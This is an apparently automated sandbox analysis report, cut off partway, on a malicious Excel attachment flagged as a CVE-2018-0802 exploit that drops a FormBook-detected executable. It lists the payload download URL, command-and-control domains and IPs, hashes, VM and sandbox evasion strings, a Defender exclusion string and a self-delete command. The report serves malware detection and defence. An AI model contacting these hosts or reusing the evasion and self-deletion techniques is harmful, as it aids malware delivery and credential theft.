          Source: 5.0.vbc.exe.1000000.2.unpack, Aspiring_Rookie/DebuggableAttribute.cs.Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.vbc.exe.1000000.0.unpack, Aspiring_Rookie/DebuggableAttribute.cs.Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001EB153 push eax; ret 4_2_001EB160
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B5758 push cs; ret 4_2_009B575C
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B5762 push cs; ret 4_2_009B5766
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B2A2 push cs; ret 5_2_0041B2A3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B3F2 push eax; ret 5_2_0041B3F8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B3FB push eax; ret 5_2_0041B462
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B3A5 push eax; ret 5_2_0041B3F8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B45C push eax; ret 5_2_0041B462
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00415414 push esp; ret 5_2_00415416
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00414F46 push cs; ret 5_2_00414F47
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BF12 push dword ptr [8427D5C5h]; ret 5_2_0041C1FF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00415FC5 push ebp; ret 5_2_00415FC6
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0073DFA1 push ecx; ret 5_2_0073DFB4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022BDFA1 push ecx; ret 7_2_022BDFB4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009B2A2 push cs; ret 7_2_0009B2A3
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009B3A5 push eax; ret 7_2_0009B3F8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009B3FB push eax; ret 7_2_0009B462
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009B3F2 push eax; ret 7_2_0009B3F8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00095414 push esp; ret 7_2_00095416
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009B45C push eax; ret 7_2_0009B462
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009BF12 push dword ptr [8427D5C5h]; ret 7_2_0009C1FF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00094F46 push cs; ret 7_2_00094F47
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00095FC5 push ebp; ret 7_2_00095FC6
          Source: initial sampleStatic PE information: section name: .text entropy: 7.86649805273

          Persistence and Installation Behavior:

          Uses ipconfig to lookup or modify the Windows network settings
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exeJump to dropped file

          Boot Survival:

          Drops PE files to the user root directory
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: Letter 1019.xlsxStream path 'EncryptedPackage' entropy: 7.99984183654 (max. 8.0)

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara matchFile source: 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2792, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 000000000008896E second address: 0000000000088974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088A0 rdtsc 5_2_004088A0
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2624Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Users\Public\vbc.exe TID: 2920Thread sleep time: -103399s >= -30000sJump to behavior
          Source: C:\Users\Public\vbc.exe TID: 2952Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 620Thread sleep time: -36000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 103399Jump to behavior
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000006.00000000.2174423680.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000006.00000000.2182851298.00000000041AD000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000006.00000000.2197382188.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088A0 rdtsc 5_2_004088A0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00409B10 LdrLoadDll,5_2_00409B10
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007426F8 mov eax, dword ptr fs:[00000030h]5_2_007426F8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022C26F8 mov eax, dword ptr fs:[00000030h]7_2_022C26F8
          Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe; Domain query: www.myfavbutik.com
          Source: C:\Windows\explorer.exe; Domain query: www.tricqr.com
          Source: C:\Windows\explorer.exe; Domain query: www.buylocalclub.info
          Source: C:\Windows\explorer.exe; Network Connect: 172.67.161.4 80
          Source: C:\Windows\explorer.exe; Domain query: www.69-1hn7uc.net
          Source: C:\Windows\explorer.exe; Network Connect: 163.43.122.104 80
          Source: C:\Windows\explorer.exe; Network Connect: 99.83.154.118 80
          Source: C:\Windows\explorer.exe; Domain query: www.defenestration.world
          Injects a PE file into a foreign processes
          Source: C:\Users\Public\vbc.exe; Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\Public\vbc.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exe; Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exe; Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\ipconfig.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\ipconfig.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\Public\vbc.exe; Thread register set: target process: 1388
          Source: C:\Windows\SysWOW64\ipconfig.exe; Thread register set: target process: 1388
          Queues an APC in another process (thread injection)
          Source: C:\Users\Public\vbc.exe; Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\Public\vbc.exe; Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 590000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exe; Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\ipconfig.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: explorer.exe, 00000006.00000000.2175046789.00000000006F0000.00000002.00000001.sdmp; Binary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.2175046789.00000000006F0000.00000002.00000001.sdmp; Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.2174423680.00000000001F5000.00000004.00000020.sdmp; Binary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.2175046789.00000000006F0000.00000002.00000001.sdmp; Binary or memory string: !Progman
          Source: C:\Users\Public\vbc.exe; Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
          Source: C:\Users\Public\vbc.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match; File source: 00000005.00000002.2208251364.0000000000530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000000.2199605074.0000000002945000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000007.00000002.2377936853.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000000.2169946011.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000007.00000002.2377903647.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.2208158353.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000002.2172726786.0000000003509000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.2.vbc.exe.35eb4f8.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 5.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 612 | Masquerading 111 | OS Credential Dumping | Security Software Discovery 321 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Exploitation for Client Execution 13 | Boot or Logon Initialization Scripts | Extra Window Memory Injection 1 | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 612 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 122 | SIM Card Swap |  | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | System Network Configuration Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 41 | Cached Domain Credentials | File and Directory Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 13 | DCSync | System Information Discovery 113 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Extra Window Memory Injection 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue

          Behavior Graph

          [Figure: behavior graph. ID: 432595; Sample: Letter 1019.xlsx; Start date: 10/06/2021; Architecture: WINDOWS; Score: 100. Process chain: EXCEL.EXE and EQNEDT32.EXE started; EQNEDT32.EXE contacted 18.140.1.169 (port 80), dropped C:\Users\Public\vbc.exe and started vbc.exe; vbc.exe started a second vbc.exe, which injected into explorer.exe; explorer.exe started ipconfig.exe, which started cmd.exe.]


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          Letter 1019.xlsx | 26% | ReversingLabs | Document-OLE.Exploit.CVE-2018-0802

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exe | 15% | ReversingLabs | ByteCode-MSIL.Spyware.Negasteal
          C:\Users\Public\vbc.exe | 15% | ReversingLabs | ByteCode-MSIL.Spyware.Negasteal

          Unpacked PE Files

          Source | Detection | Scanner | Label
          5.2.vbc.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          5.0.vbc.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          www.myfavbutik.com | 2% | Virustotal |
          www.69-1hn7uc.net | 1% | Virustotal |
          www.defenestration.world | 2% | Virustotal |

          URLs

          Source | Detection | Scanner | Label
          www.adultpeace.com/p2io/ | 0% | URL Reputation | safe
          http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
          http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
          http://www.69-1hn7uc.net/p2io/?9rx=V9Q6YNEpmTTku3594j8RVRt0udPCykKEN/raiLh+TizfOzW/z4mr+TojY495qvgWXqOzag==&1bPx7=ifrhEpc0Hv8pf4 | 0% | Avira URL Cloud | safe
          http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
          http://www.%s.com | 0% | URL Reputation | safe
          http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
          http://www.%s.comPA | 0% | URL Reputation | safe
          http://%s.com | 0% | URL Reputation | safe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
          http://treyresearch.net | 0% | URL Reputation | safe
          http://18.140.1.169/ggs/doc.exe | 100% | Avira URL Cloud | malware
          http://www.myfavbutik.com/p2io/?9rx=dKp6rERGX1oMTEkAtHZ5ksFEU2G9ncFkpMVxqDe1xbP28bbT8N8SqGfKoZnot7fJ59eAsw==&1bPx7=ifrhEpc0Hv8pf4 | 100% | Avira URL Cloud | malware

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.myfavbutik.com | 172.67.161.4 | true | true |  | unknown
          www.69-1hn7uc.net | 163.43.122.104 | true | true |  | unknown
          www.defenestration.world | 99.83.154.118 | true | true |  | unknown
          www.tricqr.com | unknown | unknown | true |  | unknown
          www.buylocalclub.info | unknown | unknown | true |  | unknown

              Contacted URLs

              Name | Malicious | Antivirus Detection | Reputation
              www.adultpeace.com/p2io/ | true | URL Reputation: safe | low
              http://www.69-1hn7uc.net/p2io/?9rx=V9Q6YNEpmTTku3594j8RVRt0udPCykKEN/raiLh+TizfOzW/z4mr+TojY495qvgWXqOzag==&1bPx7=ifrhEpc0Hv8pf4 | true | Avira URL Cloud: safe | unknown
              http://18.140.1.169/ggs/doc.exe | true | Avira URL Cloud: malware | unknown
              http://www.myfavbutik.com/p2io/?9rx=dKp6rERGX1oMTEkAtHZ5ksFEU2G9ncFkpMVxqDe1xbP28bbT8N8SqGfKoZnot7fJ59eAsw==&1bPx7=ifrhEpc0Hv8pf4 | true | Avira URL Cloud: malware | unknown

              URLs from Memory and Binaries

              Name | Source | Malicious | Antivirus Detection | Reputation
              http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | explorer.exe, 00000006.00000000.2181831950.0000000003E27000.00000002.00000001.sdmp | false |  | high
              http://www.windows.com/pctv. | explorer.exe, 00000006.00000000.2181646383.0000000003C40000.00000002.00000001.sdmp | false |  | high
              http://www.icra.org/vocabulary/. | explorer.exe, 00000006.00000000.2181831950.0000000003E27000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | explorer.exe, 00000006.00000000.2175772627.0000000001C70000.00000002.00000001.sdmp | false |  | high
              http://wellformedweb.org/CommentAPI/ | explorer.exe, 00000006.00000000.2183887794.0000000004B50000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
              http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000006.00000000.2182851298.00000000041AD000.00000004.00000001.sdmp | false |  | high
              http://www.iis.fhg.de/audioPA | explorer.exe, 00000006.00000000.2183887794.0000000004B50000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
              http://www.%s.com | explorer.exe, 00000006.00000000.2194134421.000000000A330000.00000008.00000001.sdmp | false | URL Reputation: safe | low
              http://www.piriform.com/ccleaner | explorer.exe, 00000006.00000000.2182851298.00000000041AD000.00000004.00000001.sdmp | false |  | high
              http://computername/printers/printername/.printer | explorer.exe, 00000006.00000000.2183887794.0000000004B50000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | low
              http://www.%s.comPA | explorer.exe, 00000006.00000000.2175772627.0000000001C70000.00000002.00000001.sdmp | false | URL Reputation: safe | low
              http://%s.com | explorer.exe, 00000006.00000000.2194134421.000000000A330000.00000008.00000001.sdmp | false | URL Reputation: safe | low
              http://windowsmedia.com/redir/services.asp?WMPFriendly=true | explorer.exe, 00000006.00000000.2181831950.0000000003E27000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
              http://treyresearch.net | explorer.exe, 00000006.00000000.2183887794.0000000004B50000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | vbc.exe, 00000004.00000002.2172296489.0000000002501000.00000004.00000001.sdmp | false |  | high
              http://auto.search.msn.com/response.asp?MT= | explorer.exe, 00000006.00000000.2194134421.000000000A330000.00000008.00000001.sdmp | false |  | high
              https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css | vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmp | false |  | high

                              Contacted IPs


                              Public

                              IP | Domain | Country | ASN | ASN Name | Malicious
                              163.43.122.104 | www.69-1hn7uc.net | Japan | 9370 | SAKURA-BSAKURAInternetIncJP | true
                              99.83.154.118 | www.defenestration.world | United States | 16509 | AMAZON-02US | true
                              18.140.1.169 | unknown | United States | 16509 | AMAZON-02US | true
                              172.67.161.4 | www.myfavbutik.com | United States | 13335 | CLOUDFLARENETUS | true

                              Private

                              IP
                              192.168.2.255

                              General Information

                              Joe Sandbox Version: 32.0.0 Black Diamond
                              Analysis ID: 432595
                              Start date: 10.06.2021
                              Start time: 15:23:24
                              Joe Sandbox Product: CloudBasic
                              Overall analysis duration: 0h 11m 56s
                              Hypervisor based Inspection enabled: false
                              Report type: full
                              Sample file name: Letter 1019.xlsx
                              Cookbook file name: defaultwindowsofficecookbook.jbs
                              Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                              Number of analysed new started processes analysed: 10
                              Number of new started drivers analysed: 0
                              Number of existing processes analysed: 0
                              Number of existing drivers analysed: 0
                              Number of injected processes analysed: 1
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode: default
                              Analysis stop reason: Timeout
                              Detection: MAL
                              Classification: mal100.troj.expl.evad.winXLSX@9/17@5/5
                              EGA Information: Failed
                              HDC Information:
                              • Successful, ratio: 26% (good quality ratio 24.3%)
                              • Quality average: 77.2%
                              • Quality standard deviation: 29.2%
                              HCA Information:
                              • Successful, ratio: 95%
                              • Number of executed functions: 129
                              • Number of non-executed functions: 76
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .xlsx
                              • Found Word or Excel or PowerPoint or XPS Viewer
                              • Attach to Office via COM
                              • Scroll down
                              • Close Viewer
                              Warnings:
                              • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                              • Not all processes were analyzed, report is missing behavior information
                              • Report size getting too big, too many NtCreateFile calls found.
                              • Report size getting too big, too many NtQueryAttributesFile calls found.

                              Simulations

                              Behavior and APIs

                              Time | Type | Description
                              15:24:12 | API Interceptor | 66x Sleep call for process: EQNEDT32.EXE modified
                              15:24:15 | API Interceptor | 61x Sleep call for process: vbc.exe modified
                              15:24:38 | API Interceptor | 230x Sleep call for process: ipconfig.exe modified
                              15:25:31 | API Interceptor | 1x Sleep call for process: explorer.exe modified

                              Joe Sandbox View / Context

                              IPs


                              Domains


                              ASN


                              JA3 Fingerprints

                              No context

                              Dropped Files

                              Match:C:\Users\Public\vbc.exe
                              Associated Sample Name / URL:Letter 09JUN 2021.xlsx
                              Detection:malicious

                              Match:C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exe
                              Associated Sample Name / URL:Letter 09JUN 2021.xlsx
                              Detection:malicious

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exe
                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:downloaded
                                  Size (bytes):993792
                                  Entropy (8bit):7.859694041798628
                                  Encrypted:false
                                  SSDEEP:24576:vo2y0RBSy/DrDoqbg1L+8XAaIXqziNeBUdt:vXNzrrDoeg1qYBIOiwBU
                                  MD5:15D907E7D9F8286E5053796C9D78FCEC
                                  SHA1:B7D7329E94E2292ED53E2778CEBEC533AC599030
                                  SHA-256:771E4F69520F71AFE6A6E9A4EB4DE7DCD8D7521D90DB290CA6C27B1A95C532AF
                                  SHA-512:C11D01A61F3DAB5923CC7C2A64EAE2732B5633376D3EF3F9FDF6A0E59567226ECA74B84E4CAD49DA87F6538B6C42C7F7A98A552C12E7B0917E6FF5F81D09F02E
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 15%
                                  Joe Sandbox View:
                                  • Filename: Letter 09JUN 2021.xlsx, Detection: malicious
                                  Reputation:low
                                  IE Cache URL:http://18.140.1.169/ggs/doc.exe
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\45E96AD4.png
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):50311
                                  Entropy (8bit):7.960958863022709
                                  Encrypted:false
                                  SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                                  MD5:4141C7515CE64FED13BE6D2BA33299AA
                                  SHA1:B290F533537A734B7030CE1269AC8C5398754194
                                  SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                                  SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48CD381B.png
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):51166
                                  Entropy (8bit):7.767050944061069
                                  Encrypted:false
                                  SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                                  MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                                  SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
